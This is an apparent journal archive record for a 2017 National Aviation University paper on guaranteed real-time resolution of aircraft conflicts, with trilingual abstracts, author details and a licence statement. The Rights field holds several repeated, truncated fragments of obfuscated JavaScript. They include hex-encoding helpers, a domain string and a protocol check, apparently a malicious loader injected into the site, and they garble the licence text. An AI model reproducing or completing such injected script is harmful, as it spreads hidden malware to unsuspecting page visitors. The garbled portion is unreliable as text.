Запис Детальніше

SYSTEM OF GUARANTEED RESOLUTION OF DYNAMIC CONFLICTS OF AIRCRAFTS IN REAL TIME

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title SYSTEM OF GUARANTEED RESOLUTION OF DYNAMIC CONFLICTS OF AIRCRAFTS IN REAL TIME
Система гарантированного разрешения динамических конфликтов воздушных судов в масштабе реального времени
Система гарантованого вирішення динамічних конфліктів повітряних кораблів в масштабі реального часу
 
Creator Pavlova, Svitlana; National Aviation University, Kyiv, Ukraine
Volkov, Olexander; National Aviation University, Kyiv, Ukraine
 
Subject
aircraft; air traffic; civil aviation; conflict situation; threat of collision
656.7.084

воздушное движение; воздушное судно; гражданская авиация; конфликтная ситуация; угроза столкновения
656.7.084

загроза зіткнення; конфліктна ситуація; повітряний рух; повітряне судно; цивільна авіація
656.7.084
 
Description Purpose: The present work is devoted to improving of flight safety in civil aviation by creating and implementing a new system of resolution of dynamic conflict of aircrafts. The developed system is aimed at ensuring a guaranteed level of safety when resolution of rarefied conflict situations of aircraft in real-time. Methods: The proposed system is based on a new method of conflict resolution of aircraft on the basis of the theory of invariance. Results: The development of the system of conflict resolution of aircraft in real time and the implementation of the respective algorithms such control will ensure effective prevention of dangerous approaches. Discussion: The system is implemented as single unified equipment using satellite and radar navigation systems that will ensure the positioning of aircraft in real time. Provided that the system should be installed on all aircraft and integrated on board to properly ensure its functionality and interact with navigation systems.
Цель: Настоящая работа посвящена вопросам повышения безопасности полетов в гражданской авиации путем создания и внедрения новой системы разрешения динамических конфликтных ситуаций между самолетами. Разработанная система направлена на обеспечение гарантированного уровня безопасности при разрешении разреженных конфликтных ситуаций между самолетами в реальном масштабе времени. Методы исследования: Предлагается система разрешения динамических конфликтов воздушных суден с целью повышения уровня безопасности полетов, основанная на новом методе разрешения конфликтов воздушных судов с использованием теории инвариантности. Результаты: Создание системы разрешения динамических конфликтных ситуаций воздушных судов в масштабе реального времени и реализация необходимого управления соответствующими алгоритмами для обеспечения эффективного предотвращения опасных сближений. Обсуждение: Система реализуется в виде отдельного унифицированного оборудования, работающего с использованием спутниковых и радиолокационных систем навигации, что позволит обеспечить определение координат воздушных судов в масштабе реального времени. Предусмотрено, что система должна быть установлена на все воздушные судна и интегрирована в бортовую среду для надлежащего обеспечения её функциональности и взаимодействия с бортовыми навигационными системами.
Мета: Робота присвячена питанням підвищення безпеки польотів у цивільній авіації шляхом створення йі впровадження нової системи розв’язання динамічних конфліктних ситуацій між літаками. Розроблена система спрямована на забезпечення гарантованого рівня безпеки при розв’язанні розріджених конфліктних ситуацій між літаками в масштабі реального часу. Методи дослідження: Пропонується система розв’язання динамічних конфліктів повітряних кораблів з метою підвищення рівня безпеки польотів, заснована на новому методі розв’язання конфліктів повітряних кораблів, з використанням теорії інваріантності. Результати: Створення системи розв’язання динамічних конфліктних ситуацій повітряних кораблів в масштабі реального часу і реалізація потрібного управління відповідними алгоритмами для забезпечення ефективного запобігання небезпечних зближень. Обговорення: Система реалізується у вигляді окремого уніфікованого обладнання, що працює з використанням супутникових та радіолокаційних систем навігації, що дозволить забезпечити визначення координат повітряних кораблів в масштабі реального часу. Передбачено, що система повинна бути встановлена на всі повітряні кораблі і інтегрована в бортове середовище для належного забезпечення її функціональності і взаємодії з бортовими навігаційними системами.
 
Publisher National Aviation University
 
Contributor


 
Date 2017-03-28
 
Type


 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11420
10.18372/2306-1472.70.11420
 
Source Proceedings of the National Aviation University; Том 70, № 1 (2017); 29-35
Вестник Национального авиационного университета; Том 70, № 1 (2017); 29-35
Вісник Національного Авіаційного Університету; Том 70, № 1 (2017); 29-35
 
Language uk
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e